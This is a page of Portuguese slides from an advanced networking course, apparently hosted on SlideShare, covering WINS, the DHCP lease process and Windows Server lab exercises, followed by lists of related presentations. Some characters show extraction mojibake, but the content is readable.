– Reduz a necessidade de manter e atualizar os arquivos 
LMHOSTS. 
¨ Desvantagens: 
– Não implementa um mecanismo de nomes hierárquico. 
Isto dificulta a administração de redes de grande porte. 
– O banco de dados que armazena os nomes NetBIOS não 
ĂŠ distribuĂ­do. Cada servidor WINS constitui uma rĂŠplica 
completa do banco de dados de nomes. 
– Não é compatível com o serviço de nomes usado na 
Internet.
DHCP 
251
DHCP 
¨Dynamic Host Configuration Protocol 
– Padrão Industrial Aberto 
• IETF RFC 1533, 1534, 1541 e 1542. 
– IETF: Internet Engineering Task Force 
– RFC: Request for Comments 
– Utilizado para centralizar a administração e 
configuração de parâmetros TCP/IP numa 
rede. 
– Elimina a necessidade de configurar 
manualmente os clientes numa rede 
TCP/IP.
DHCP - Arquitetura Cliente- 
Servidor ¨ Um computador da rede deve funcionar como servidor DHCP. 
REQUEST 
REPLY 
CLIENTES 
DHCP 
SERVIDOR 
DHCP
Administração de Endereços IP 
¨ Cada computador numa rede TCP/IP deve ter um 
endereço IP único. 
– O endereço IP identifica a estação e a rede ao qual a 
estação pertence. 
– Quando o computador é movido para outra rede, seu 
endereço IP deve refletir esta mudança. 
¨ DHCP especifica os seguintes serviços (RFC 1541): 
– um protocolo para que o servidor DHCP e seus clientes se 
comuniquem. 
• PROTOCOLO BOOTP 
– Um método para configura os parâmetros de rede de um 
host IP: 
• IP, máscara, gateway default, servidores de nomes, etc.
ESCOPO DHCP 
¨ Quando se utiliza DHCP, cada rede local Ê caracterizada 
por um ESCOPO: 
PARTE FIXA 
MASCARA 
GATEWAY 
SERVIDOR DE NOMES 
OUTRAS ROTAS 
PERÍODO DE EMPRÉSTIMO 
PARTE DINÂMICA 
RANGE DE IP’S 
MESMO VALOR 
PARA TODOS OS 
HOSTS DO ESCOPO 
UM VALOR 
DIFERENTE PARA 
CADA HOST DO 
ESCOPO
Processo de Atribuição 
Cliente 
DHCP 
ESCOPO 
Servidor 
DHCP 
Dhcpdiscover 
Dhcpoffer 200.17.98.1 
Dhcprequest 200.17.98.1 
Dhcpack 200.17.98.1 
...... 
Dhcprelease 200.17.98.1 
TTooddaass aass 
mmeennssaaggeennss ssĂŁĂŁoo 
eennvviiaaddaass eemm 
bbrrooaaddccaasstt 
255.255.255.0 
200.17.98.23 
72 horas 
200.17.98.1 
… 
200.17.98.254
Processo de Atribuição 
¨ 1) O cliente envia a mensagem DDhhccppddiissccoovveerr eemm bbrrooaaddccaasstt.. 
– O endereço IP de origem do pacote é 0.0.0.0 pois o 
cliente ainda não tem um endereço IP. 
¨ 2) Quando o servidor recebe o pacote, ele seleciona um 
endereço IP disponível na sua lista e oferece ao cliente. 
– O servidor responde ao cliente com a mensagem 
Dhcpoffer 
¨ 33)) QQuuaannddoo oo cclliieennttee rreecceebbee aa ooffeerrttaa eellee ppooddee:: 
– aceitar enviando a mensagem Dhcprequest (incluindo o 
IP) em broadcast 
– recusar enviando a mensagem Dhcpdecline em broadcast 
¨ 44)) QQuuaannddoo oo sseerrvviiddoorr rreecceebbee oo DDhhccpprreeqquueesstt eellee ppooddee:: 
– confirmar para o cliente com a mensagem Dhcpack 
– recusar, se o endereço foi usado por outro, com a 
mensagem Dhcpnack 
¨ 5) O cliente pode liberar um endereço com a mensagem 
Dhcprelease.
Observaçþes 
¨ 1) O cliente aceita a primeira oferta que receber. 
– Se houver mais de um servidor DHCP distribuindo 
endereços IP, não haverå como selecionar 
apenas um deles. 
¨ 2) O direito do cliente de usar o endereço IP 
recebido pelo servidor DHCP ĂŠ temporĂĄrio. 
– Quando o prazo de validade do IP expira, o 
servidor pode atribuí-lo a outra estação na rede. 
– O cliente pode liberá-lo antecipadamente com a 
mensagem Dhcprelease
Observaçþes 
¨ 3) Se o cliente não receber a oferta do 
servidor: 
– Ele repete o pedido em intervalos de 2, 4, 
8, 16 segundos. 
– Se as 4 tentativas fracassarem, ele tenta 
novamente em intervalos de 5 minutos. 
¨ 4) Quando o cliente Ê reinicializado, ele tenta 
utilizar o mesmo IP que tinha anteriormente. 
– Ele envia o pacote Dhcprequest com o 
endereço IP antigo ao invÊs do 
Dhcpdiscover. 
– Se o pedido é negado, então o cliente 
envia um Dhcpdiscover.
Processo de Atribuição: Outras 
Vezes 
Cliente 
DHCP 
ESCOPO 
Servidor 
DHCP 
Dhcprequest 200.17.98.1 
Dhcpack 200.17.98.1 
TTooddaass aass 
mmeennssaaggeennss ssĂŁĂŁoo 
eennvviiaaddaass eemm 
bbrrooaaddccaasstt 
255.255.255.0 
200.17.98.23 
72 horas 
200.17.98.1 
… 
200.17.98.254 
OU 
Dhcpnack 
Dhcpdiscover 
…
Consideraçþes sobre o 
Planejamento da 
Implementação do DHCP 
¨ Para redes não segmentadas: 
– Um único servidor DHCP pode atender até 10000 clientes 
(estimativa). 
¨ Para redes segmentadas: 
– Se os roteadores são compatíveis com a RFC1542 
• Um único servidor DHCP é suficiente. 
– Se os roteadores não são compatíveis com a RFC1542 
• Deve-se utilizar um servidor DHCP para cada rede. 
¨ Computadores que se ligam temporariamente na rede 
(notebooks, por exemplo) devem receber IPs com 
tempo de “leasing” curto.
Posicionando Servidores DHCP 
Roteador 
RFC 1542 
compatĂ­vel 
Agente relay 
DHCP/BOO 
TP 
Servidor 
DHCP 1 
Roteador nĂŁo RFC 
1542 
compatĂ­vel 
Servidor 
DHCP 2
PrĂĄtica: DHCP 
¨Instalar e configurar o DHCP; 
¨Criar Escopo 
¨Áreas de exclusþes 
¨Definir arquivos por MAC ADDRESS 
263
Pråtica : Instalação DHCP 
264
Pråtica: Instalação de Serviços 
¨DNS 
¨Terminal Service 
¨Wins 
265
Instalar Terminal Service 
266
PrĂĄtica : Instalando o IIS 
¨Instalando e configurando 
¨Disponibilizando um site 
¨Configurando o DNS 
267
PrĂĄtica: IIS 
268
PrĂĄtica: IIS 
269
Pråtica: Criação de Domínio 
¨Instalar e configurar o dominio; 
¨Criar usuårios 
¨Compartilhamento de arquivos 
¨Definição de segurança com o GPO 
270
Pråtica: Instalação DHCP 
271
PrĂĄtica: Criar DomĂ­nio 
¨Iniciar / Executar / dcpromo 
272
PrĂĄtica: Criar DomĂ­nio 
273
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes
62282591 senai-curso-avancado-redes

Weitere ähnliche Inhalte

Was ist angesagt?

Infraestrutura e Componentes de Redes de Dados
Infraestrutura e Componentes de Redes de DadosInfraestrutura e Componentes de Redes de Dados
Infraestrutura e Componentes de Redes de Dadostiredes
 
Aula 02 redes de computadores e a internet
Aula 02   redes de computadores e a internetAula 02   redes de computadores e a internet
Aula 02 redes de computadores e a internetssuser75b0ac
 
Tutorial completo como montar uma rede de computadores
Tutorial completo como montar uma rede de computadoresTutorial completo como montar uma rede de computadores
Tutorial completo como montar uma rede de computadoresjulioblogger
 
Aula 05 - ExercĂ­cio de projeto - Projeto de Redes de Computadores
Aula 05 - ExercĂ­cio de projeto - Projeto de Redes de ComputadoresAula 05 - ExercĂ­cio de projeto - Projeto de Redes de Computadores
Aula 05 - ExercĂ­cio de projeto - Projeto de Redes de ComputadoresDalton Martins
 
Dispositivos de ligação dos componentes à rede
Dispositivos de ligação dos componentes à redeDispositivos de ligação dos componentes à rede
Dispositivos de ligação dos componentes à redeTaniabastos15
 
Funçþes dos dispositivos de rede
Funçþes dos dispositivos de redeFunçþes dos dispositivos de rede
Funçþes dos dispositivos de redeGonçalo
 
Vantagens e desvantagens em topologias de redes
Vantagens e desvantagens em topologias de redesVantagens e desvantagens em topologias de redes
Vantagens e desvantagens em topologias de redesMarco Martins
 
Unidade2 projeto lĂłgico da rede
Unidade2   projeto lĂłgico da redeUnidade2   projeto lĂłgico da rede
Unidade2 projeto lĂłgico da redeLeandro Almeida
 
Dispositivos de Rede
Dispositivos de RedeDispositivos de Rede
Dispositivos de RedeRui Ferreira
 
Hardware e redes de computadores (Componente, tipos de redes e topologias)
Hardware e redes de computadores (Componente, tipos de redes e topologias)Hardware e redes de computadores (Componente, tipos de redes e topologias)
Hardware e redes de computadores (Componente, tipos de redes e topologias)Augusto Nogueira
 
Julia aula mestrado equipamentos de rede
Julia aula mestrado equipamentos de redeJulia aula mestrado equipamentos de rede
Julia aula mestrado equipamentos de redeAna Julia F Alves Ferreira
 
Apostila Digital
Apostila DigitalApostila Digital
Apostila DigitalJakson Silva
 
Tecnologias Atuais de Redes - Aula 4 - Comutação [Apostila]
Tecnologias Atuais de Redes - Aula 4 - Comutação [Apostila]Tecnologias Atuais de Redes - Aula 4 - Comutação [Apostila]
Tecnologias Atuais de Redes - Aula 4 - Comutação [Apostila]MinistÊrio Público da Paraíba
 
Componentes de uma Rede de computadores
Componentes de uma Rede de computadoresComponentes de uma Rede de computadores
Componentes de uma Rede de computadoresFelipe Silva
 
258420 projeto-de-rede-local
258420 projeto-de-rede-local258420 projeto-de-rede-local
258420 projeto-de-rede-localCezar Ceretta
 

Was ist angesagt? (20)

Infraestrutura e Componentes de Redes de Dados
Infraestrutura e Componentes de Redes de DadosInfraestrutura e Componentes de Redes de Dados
Infraestrutura e Componentes de Redes de Dados
 
Aula 02 redes de computadores e a internet
Aula 02   redes de computadores e a internetAula 02   redes de computadores e a internet
Aula 02 redes de computadores e a internet
 
Tutorial completo como montar uma rede de computadores
Tutorial completo como montar uma rede de computadoresTutorial completo como montar uma rede de computadores
Tutorial completo como montar uma rede de computadores
 
Como montar uma rede cabeada
Como montar uma rede cabeadaComo montar uma rede cabeada
Como montar uma rede cabeada
 
Projeto de Rede Local (LAN)
Projeto de Rede Local (LAN)Projeto de Rede Local (LAN)
Projeto de Rede Local (LAN)
 
Aula 05 - ExercĂ­cio de projeto - Projeto de Redes de Computadores
Aula 05 - ExercĂ­cio de projeto - Projeto de Redes de ComputadoresAula 05 - ExercĂ­cio de projeto - Projeto de Redes de Computadores
Aula 05 - ExercĂ­cio de projeto - Projeto de Redes de Computadores
 
Dispositivos de ligação dos componentes à rede
Dispositivos de ligação dos componentes à redeDispositivos de ligação dos componentes à rede
Dispositivos de ligação dos componentes à rede
 
Funçþes dos dispositivos de rede
Funçþes dos dispositivos de redeFunçþes dos dispositivos de rede
Funçþes dos dispositivos de rede
 
Vantagens e desvantagens em topologias de redes
Vantagens e desvantagens em topologias de redesVantagens e desvantagens em topologias de redes
Vantagens e desvantagens em topologias de redes
 
Unidade2 projeto lĂłgico da rede
Unidade2   projeto lĂłgico da redeUnidade2   projeto lĂłgico da rede
Unidade2 projeto lĂłgico da rede
 
Dispositivos de Rede
Dispositivos de RedeDispositivos de Rede
Dispositivos de Rede
 
Hardware e redes de computadores (Componente, tipos de redes e topologias)
Hardware e redes de computadores (Componente, tipos de redes e topologias)Hardware e redes de computadores (Componente, tipos de redes e topologias)
Hardware e redes de computadores (Componente, tipos de redes e topologias)
 
Julia aula mestrado equipamentos de rede
Julia aula mestrado equipamentos de redeJulia aula mestrado equipamentos de rede
Julia aula mestrado equipamentos de rede
 
Apostila Digital
Apostila DigitalApostila Digital
Apostila Digital
 
Rede
RedeRede
Rede
 
Tecnologias de transmissĂŁo
Tecnologias de transmissĂŁoTecnologias de transmissĂŁo
Tecnologias de transmissĂŁo
 
Tecnologias Atuais de Redes - Aula 4 - Comutação [Apostila]
Tecnologias Atuais de Redes - Aula 4 - Comutação [Apostila]Tecnologias Atuais de Redes - Aula 4 - Comutação [Apostila]
Tecnologias Atuais de Redes - Aula 4 - Comutação [Apostila]
 
Componentes de uma Rede de computadores
Componentes de uma Rede de computadoresComponentes de uma Rede de computadores
Componentes de uma Rede de computadores
 
Aula 05 introducao aos sistemas estruturados
Aula 05   introducao aos sistemas estruturadosAula 05   introducao aos sistemas estruturados
Aula 05 introducao aos sistemas estruturados
 
258420 projeto-de-rede-local
258420 projeto-de-rede-local258420 projeto-de-rede-local
258420 projeto-de-rede-local
 

Andere mochten auch

Ebep pcomponente do curso cabeamento estruturado
Ebep pcomponente do curso cabeamento estruturadoEbep pcomponente do curso cabeamento estruturado
Ebep pcomponente do curso cabeamento estruturadoredtambe
 
Inconfidência nº 223 de 31 de janeiro‏
Inconfidência nº 223 de 31 de janeiro‏Inconfidência nº 223 de 31 de janeiro‏
Inconfidência nº 223 de 31 de janeiro‏Lucio Borges
 
Inconfidência 227‏
Inconfidência 227‏Inconfidência 227‏
Inconfidência 227‏Lucio Borges
 
Licitaçþes e contratos exercicio
Licitaçþes e contratos exercicioLicitaçþes e contratos exercicio
Licitaçþes e contratos exercicioFernando Mendes
 
Edital Analista Ambiental IBAMA 2008
Edital Analista Ambiental IBAMA 2008 Edital Analista Ambiental IBAMA 2008
Edital Analista Ambiental IBAMA 2008 Concurso Virtual
 
Jn 25 04
Jn 25   04Jn 25   04
Jn 25 04daquimoc
 
InteligĂŞncia Artificial
InteligĂŞncia ArtificialInteligĂŞncia Artificial
InteligĂŞncia ArtificialPapos na rede
 
Cadastro de participantes no 2 CTV
Cadastro de participantes no 2 CTVCadastro de participantes no 2 CTV
Cadastro de participantes no 2 CTVRicardo Ferrao
 
Governança de TI
Governança de TIGovernança de TI
Governança de TIMarcos Vinicius
 
TELEX FREE BRAZIL OFICIAL
TELEX FREE BRAZIL OFICIALTELEX FREE BRAZIL OFICIAL
TELEX FREE BRAZIL OFICIALtelexfreebrazil
 
Livro 2010 manejo_cons_solo_agua
Livro 2010 manejo_cons_solo_aguaLivro 2010 manejo_cons_solo_agua
Livro 2010 manejo_cons_solo_aguaHEITOR SANTOS
 
Gestão de Serviços de TIcom a ITIL
Gestão de Serviços de TIcom a ITILGestão de Serviços de TIcom a ITIL
Gestão de Serviços de TIcom a ITILJean Israel B. Feijó
 
Inscricoes 2 Ctv
Inscricoes 2 CtvInscricoes 2 Ctv
Inscricoes 2 CtvRicardo Ferrao
 

Andere mochten auch (20)

Ebep pcomponente do curso cabeamento estruturado
Ebep pcomponente do curso cabeamento estruturadoEbep pcomponente do curso cabeamento estruturado
Ebep pcomponente do curso cabeamento estruturado
 
Inconfidência nº 223 de 31 de janeiro‏
Inconfidência nº 223 de 31 de janeiro‏Inconfidência nº 223 de 31 de janeiro‏
Inconfidência nº 223 de 31 de janeiro‏
 
Inconfidência 227‏
Inconfidência 227‏Inconfidência 227‏
Inconfidência 227‏
 
Sistema redex
Sistema redexSistema redex
Sistema redex
 
Jornal UFG
Jornal UFGJornal UFG
Jornal UFG
 
Literatas NÂş 20 - 2012
Literatas NÂş 20 - 2012Literatas NÂş 20 - 2012
Literatas NÂş 20 - 2012
 
Licitaçþes e contratos exercicio
Licitaçþes e contratos exercicioLicitaçþes e contratos exercicio
Licitaçþes e contratos exercicio
 
Edital Analista Ambiental IBAMA 2008
Edital Analista Ambiental IBAMA 2008 Edital Analista Ambiental IBAMA 2008
Edital Analista Ambiental IBAMA 2008
 
Instruçþes aula livre
Instruçþes aula livreInstruçþes aula livre
Instruçþes aula livre
 
Jn 25 04
Jn 25   04Jn 25   04
Jn 25 04
 
InteligĂŞncia Artificial
InteligĂŞncia ArtificialInteligĂŞncia Artificial
InteligĂŞncia Artificial
 
Governança de TI
Governança de TIGovernança de TI
Governança de TI
 
Gasobras
GasobrasGasobras
Gasobras
 
Anais viii 2011
Anais viii 2011Anais viii 2011
Anais viii 2011
 
Cadastro de participantes no 2 CTV
Cadastro de participantes no 2 CTVCadastro de participantes no 2 CTV
Cadastro de participantes no 2 CTV
 
Governança de TI
Governança de TIGovernança de TI
Governança de TI
 
TELEX FREE BRAZIL OFICIAL
TELEX FREE BRAZIL OFICIALTELEX FREE BRAZIL OFICIAL
TELEX FREE BRAZIL OFICIAL
 
Livro 2010 manejo_cons_solo_agua
Livro 2010 manejo_cons_solo_aguaLivro 2010 manejo_cons_solo_agua
Livro 2010 manejo_cons_solo_agua
 
Gestão de Serviços de TIcom a ITIL
Gestão de Serviços de TIcom a ITILGestão de Serviços de TIcom a ITIL
Gestão de Serviços de TIcom a ITIL
 
Inscricoes 2 Ctv
Inscricoes 2 CtvInscricoes 2 Ctv
Inscricoes 2 Ctv
 

Ähnlich wie 62282591 senai-curso-avancado-redes

36210961 curso-avancado-redes
36210961 curso-avancado-redes36210961 curso-avancado-redes
36210961 curso-avancado-redesMarco GuimarĂŁes
 
Aula 07 - Projeto de Topologia e ExercĂ­cios - Parte II
Aula 07 - Projeto de Topologia e ExercĂ­cios - Parte IIAula 07 - Projeto de Topologia e ExercĂ­cios - Parte II
Aula 07 - Projeto de Topologia e ExercĂ­cios - Parte IIDalton Martins
 
Comunicação de Dados - Modulo 5
 Comunicação de Dados - Modulo 5 Comunicação de Dados - Modulo 5
Comunicação de Dados - Modulo 5Mariana Hiyori
 
31_Dias_Para_o_CCNA.pdf
31_Dias_Para_o_CCNA.pdf31_Dias_Para_o_CCNA.pdf
31_Dias_Para_o_CCNA.pdfssuser405a251
 
Imurl slides
Imurl slidesImurl slides
Imurl slidesPelo Siro
 
AULA DE REDES DIA 22.062023.pptx
AULA DE REDES DIA 22.062023.pptxAULA DE REDES DIA 22.062023.pptx
AULA DE REDES DIA 22.062023.pptxCidrone
 
Apresentaçao Final De Redes
Apresentaçao Final De RedesApresentaçao Final De Redes
Apresentaçao Final De Redesguesta9bd8d
 
ApresentaçAo Final De Redes
ApresentaçAo Final De RedesApresentaçAo Final De Redes
ApresentaçAo Final De Redesallanzinhuu
 
Factura Clix
Factura ClixFactura Clix
Factura Clixpedro pires
 
Unidade 05 introdução a computação - redes de computadores - 15-03-03 - 47 ...
Unidade 05   introdução a computação - redes de computadores - 15-03-03 - 47 ...Unidade 05   introdução a computação - redes de computadores - 15-03-03 - 47 ...
Unidade 05 introdução a computação - redes de computadores - 15-03-03 - 47 ...Alex Casaùas
 
Unidade 05 introdução a computação - redes de computadores - 15-03-03 - 47 ...
Unidade 05   introdução a computação - redes de computadores - 15-03-03 - 47 ...Unidade 05   introdução a computação - redes de computadores - 15-03-03 - 47 ...
Unidade 05 introdução a computação - redes de computadores - 15-03-03 - 47 ...Alex Casaùas
 
Redes montando pequenas redes
Redes   montando pequenas redesRedes   montando pequenas redes
Redes montando pequenas redesrobinhoct
 
Montando pequenas redes
Montando pequenas redesMontando pequenas redes
Montando pequenas redesFelipe Pereira
 
Memorial marina flavia_caroline
Memorial marina flavia_caroline Memorial marina flavia_caroline
Memorial marina flavia_caroline Marina Krummenauer
 

Ähnlich wie 62282591 senai-curso-avancado-redes (20)

36210961 curso-avancado-redes
36210961 curso-avancado-redes36210961 curso-avancado-redes
36210961 curso-avancado-redes
 
Curso redes seed
Curso redes seedCurso redes seed
Curso redes seed
 
Aula 07 - Projeto de Topologia e ExercĂ­cios - Parte II
Aula 07 - Projeto de Topologia e ExercĂ­cios - Parte IIAula 07 - Projeto de Topologia e ExercĂ­cios - Parte II
Aula 07 - Projeto de Topologia e ExercĂ­cios - Parte II
 
Comunicação de Dados - Modulo 5
 Comunicação de Dados - Modulo 5 Comunicação de Dados - Modulo 5
Comunicação de Dados - Modulo 5
 
31_Dias_Para_o_CCNA.pdf
31_Dias_Para_o_CCNA.pdf31_Dias_Para_o_CCNA.pdf
31_Dias_Para_o_CCNA.pdf
 
Imurl slides
Imurl slidesImurl slides
Imurl slides
 
Conceitos bĂĄsicos 01
Conceitos bĂĄsicos   01Conceitos bĂĄsicos   01
Conceitos bĂĄsicos 01
 
AULA DE REDES DIA 22.062023.pptx
AULA DE REDES DIA 22.062023.pptxAULA DE REDES DIA 22.062023.pptx
AULA DE REDES DIA 22.062023.pptx
 
Apresentaçao Final De Redes
Apresentaçao Final De RedesApresentaçao Final De Redes
Apresentaçao Final De Redes
 
ApresentaçAo Final De Redes
ApresentaçAo Final De RedesApresentaçAo Final De Redes
ApresentaçAo Final De Redes
 
Factura Clix
Factura ClixFactura Clix
Factura Clix
 
Unidade 05 introdução a computação - redes de computadores - 15-03-03 - 47 ...
Unidade 05   introdução a computação - redes de computadores - 15-03-03 - 47 ...Unidade 05   introdução a computação - redes de computadores - 15-03-03 - 47 ...
Unidade 05 introdução a computação - redes de computadores - 15-03-03 - 47 ...
 
Unidade 05 introdução a computação - redes de computadores - 15-03-03 - 47 ...
Unidade 05   introdução a computação - redes de computadores - 15-03-03 - 47 ...Unidade 05   introdução a computação - redes de computadores - 15-03-03 - 47 ...
Unidade 05 introdução a computação - redes de computadores - 15-03-03 - 47 ...
 
Redes montando pequenas redes
Redes   montando pequenas redesRedes   montando pequenas redes
Redes montando pequenas redes
 
Montando pequenas redes
Montando pequenas redesMontando pequenas redes
Montando pequenas redes
 
Memorial marina flavia_caroline
Memorial marina flavia_caroline Memorial marina flavia_caroline
Memorial marina flavia_caroline
 
13 ligaçþes inter-redes
13   ligaçþes inter-redes13   ligaçþes inter-redes
13 ligaçþes inter-redes
 
Cabling 96
Cabling 96Cabling 96
Cabling 96
 
Gv redes industriais
Gv redes industriaisGv redes industriais
Gv redes industriais
 
Modelo osi
Modelo osiModelo osi
Modelo osi
 

Mehr von Marco GuimarĂŁes

aula6-equipamentos-de-redes-redes-sem-fio
aula6-equipamentos-de-redes-redes-sem-fioaula6-equipamentos-de-redes-redes-sem-fio
aula6-equipamentos-de-redes-redes-sem-fioMarco GuimarĂŁes
 
126015847 seguranca-de-redes-criptografia-2
126015847 seguranca-de-redes-criptografia-2126015847 seguranca-de-redes-criptografia-2
126015847 seguranca-de-redes-criptografia-2Marco GuimarĂŁes
 
27469903 gerencia-em-redes-de-computadores
27469903 gerencia-em-redes-de-computadores27469903 gerencia-em-redes-de-computadores
27469903 gerencia-em-redes-de-computadoresMarco GuimarĂŁes
 
215610229 seguranca-de-redes
215610229 seguranca-de-redes215610229 seguranca-de-redes
215610229 seguranca-de-redesMarco GuimarĂŁes
 
222097384 aulas-de-rede-tipos-de-servidores
222097384 aulas-de-rede-tipos-de-servidores222097384 aulas-de-rede-tipos-de-servidores
222097384 aulas-de-rede-tipos-de-servidoresMarco GuimarĂŁes
 
138009610 aula2-equipamentos-de-redes-hubs
138009610 aula2-equipamentos-de-redes-hubs138009610 aula2-equipamentos-de-redes-hubs
138009610 aula2-equipamentos-de-redes-hubsMarco GuimarĂŁes
 
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01164519997 curso-de-redes-laercio-vasconcelos-capitulo-01
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01Marco GuimarĂŁes
 
216489785 palestra-tipos-de-escadas-montar
216489785 palestra-tipos-de-escadas-montar216489785 palestra-tipos-de-escadas-montar
216489785 palestra-tipos-de-escadas-montarMarco GuimarĂŁes
 
81221835 ergoihc-teste-de-usabilidade-ariel
81221835 ergoihc-teste-de-usabilidade-ariel81221835 ergoihc-teste-de-usabilidade-ariel
81221835 ergoihc-teste-de-usabilidade-arielMarco GuimarĂŁes
 
127290035 12-usabilidade-mai-2007
127290035 12-usabilidade-mai-2007127290035 12-usabilidade-mai-2007
127290035 12-usabilidade-mai-2007Marco GuimarĂŁes
 
49778140 projeto-de-rede
49778140 projeto-de-rede49778140 projeto-de-rede
49778140 projeto-de-redeMarco GuimarĂŁes
 
51835801 projeto-de-rede2
51835801 projeto-de-rede251835801 projeto-de-rede2
51835801 projeto-de-rede2Marco GuimarĂŁes
 
215610229 seguranca-de-redes (1)
215610229 seguranca-de-redes (1)215610229 seguranca-de-redes (1)
215610229 seguranca-de-redes (1)Marco GuimarĂŁes
 
43512935 projeto-de-redes
43512935 projeto-de-redes43512935 projeto-de-redes
43512935 projeto-de-redesMarco GuimarĂŁes
 
36552531 seguranca-de-redes-firewall
36552531 seguranca-de-redes-firewall36552531 seguranca-de-redes-firewall
36552531 seguranca-de-redes-firewallMarco GuimarĂŁes
 
126015847 seguranca-de-redes-criptografia-2 (1)
126015847 seguranca-de-redes-criptografia-2 (1)126015847 seguranca-de-redes-criptografia-2 (1)
126015847 seguranca-de-redes-criptografia-2 (1)Marco GuimarĂŁes
 

Mehr von Marco GuimarĂŁes (20)

aula6-equipamentos-de-redes-redes-sem-fio
aula6-equipamentos-de-redes-redes-sem-fioaula6-equipamentos-de-redes-redes-sem-fio
aula6-equipamentos-de-redes-redes-sem-fio
 
126015847 seguranca-de-redes-criptografia-2
126015847 seguranca-de-redes-criptografia-2126015847 seguranca-de-redes-criptografia-2
126015847 seguranca-de-redes-criptografia-2
 
145508420 redes
145508420 redes145508420 redes
145508420 redes
 
27469903 gerencia-em-redes-de-computadores
27469903 gerencia-em-redes-de-computadores27469903 gerencia-em-redes-de-computadores
27469903 gerencia-em-redes-de-computadores
 
215610229 seguranca-de-redes
215610229 seguranca-de-redes215610229 seguranca-de-redes
215610229 seguranca-de-redes
 
222097384 aulas-de-rede-tipos-de-servidores
222097384 aulas-de-rede-tipos-de-servidores222097384 aulas-de-rede-tipos-de-servidores
222097384 aulas-de-rede-tipos-de-servidores
 
138009610 aula2-equipamentos-de-redes-hubs
138009610 aula2-equipamentos-de-redes-hubs138009610 aula2-equipamentos-de-redes-hubs
138009610 aula2-equipamentos-de-redes-hubs
 
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01164519997 curso-de-redes-laercio-vasconcelos-capitulo-01
164519997 curso-de-redes-laercio-vasconcelos-capitulo-01
 
216489785 palestra-tipos-de-escadas-montar
216489785 palestra-tipos-de-escadas-montar216489785 palestra-tipos-de-escadas-montar
216489785 palestra-tipos-de-escadas-montar
 
81221835 ergoihc-teste-de-usabilidade-ariel
81221835 ergoihc-teste-de-usabilidade-ariel81221835 ergoihc-teste-de-usabilidade-ariel
81221835 ergoihc-teste-de-usabilidade-ariel
 
127290035 12-usabilidade-mai-2007
127290035 12-usabilidade-mai-2007127290035 12-usabilidade-mai-2007
127290035 12-usabilidade-mai-2007
 
49778140 projeto-de-rede
49778140 projeto-de-rede49778140 projeto-de-rede
49778140 projeto-de-rede
 
51835801 projeto-de-rede2
51835801 projeto-de-rede251835801 projeto-de-rede2
51835801 projeto-de-rede2
 
215610229 seguranca-de-redes (1)
215610229 seguranca-de-redes (1)215610229 seguranca-de-redes (1)
215610229 seguranca-de-redes (1)
 
43512935 projeto-de-redes
43512935 projeto-de-redes43512935 projeto-de-redes
43512935 projeto-de-redes
 
36552531 seguranca-de-redes-firewall
36552531 seguranca-de-redes-firewall36552531 seguranca-de-redes-firewall
36552531 seguranca-de-redes-firewall
 
126015847 seguranca-de-redes-criptografia-2 (1)
126015847 seguranca-de-redes-criptografia-2 (1)126015847 seguranca-de-redes-criptografia-2 (1)
126015847 seguranca-de-redes-criptografia-2 (1)
 
192151378 seguranca
192151378 seguranca192151378 seguranca
192151378 seguranca
 
134318809 seguranca
134318809 seguranca134318809 seguranca
134318809 seguranca
 
64441203 seguranca
64441203 seguranca64441203 seguranca
64441203 seguranca
 

62282591 senai-curso-avancado-redes

  • 1. 1 REDES AVANÇADAS Eudes Danilo Mendonça 12/09/2009 eudesdanilo@gmail.com http://www.4shared.com/file/59507480/8e48421c/ SENAI_-_CURSO_AVANCADO_REDES.html
  • 2. PrĂŠ-requisitos: ¨ Conhecimentos bĂĄsicos em redes ¨ Quem sou eu? ¨ Quem sĂŁo vocĂŞs? ¨ O que esperam da matĂŠria? ¨ Quais as experiĂŞncias em Redes? ¨ Conhecimentos em Windows Server e/ou Linux? 2 Apresentação
  • 3. Sinopse: I - RevisĂŁo dos Conhecimentos BĂĄsicos de Redes: Conceitos de Redes, equipamentos, perifĂŠricos e conexĂŁo da rede II - Noçþes de Cabeamento Estruturado: Conhecimento de Asbuilt, certificação de uma rede, elaboração de um anteprojeto de rede, elaboração de um projeto de redes. III - Noção de Protocolo de Rede : Conhecimento da camada OSI, estudo do protocolo TCP/IP, subnet de rede, roteamento de rede IV - Redes Ponto-a-Ponto Projeto; V - Segurança de Rede: Noçþes de segurança fĂ­sica e lĂłgica, objetivos, introdução a ataques, vulnerabilidade, como previnir ataques VI - Windows 2003 Server: Instalação, configuração de serviços (DHCP, DNS, WINS, IIS, FTP), servidor de arquivos, servidor de ImpressĂŁo, Active Direct, Segurança em nĂ­vel de recursos - PermissĂľes de arquivos, Backup e Recuperação, Logs e Serviços, Monitoramento fĂ­sico e lĂłgico da rede VII – Linux: Instalação, configuração de serviços (DHCP, FTP, APACHE, SSH), Segurança em nĂ­vel de Recursos - PermissĂľes de arquivos, Backup e Recuperação, Logs, Serviços, acessos apartir de estaçþes Windows e TransmissĂŁo de arquivos entre windows e linux VIII - Ambiente Misto: Integração de serviços (WEB, FTP, 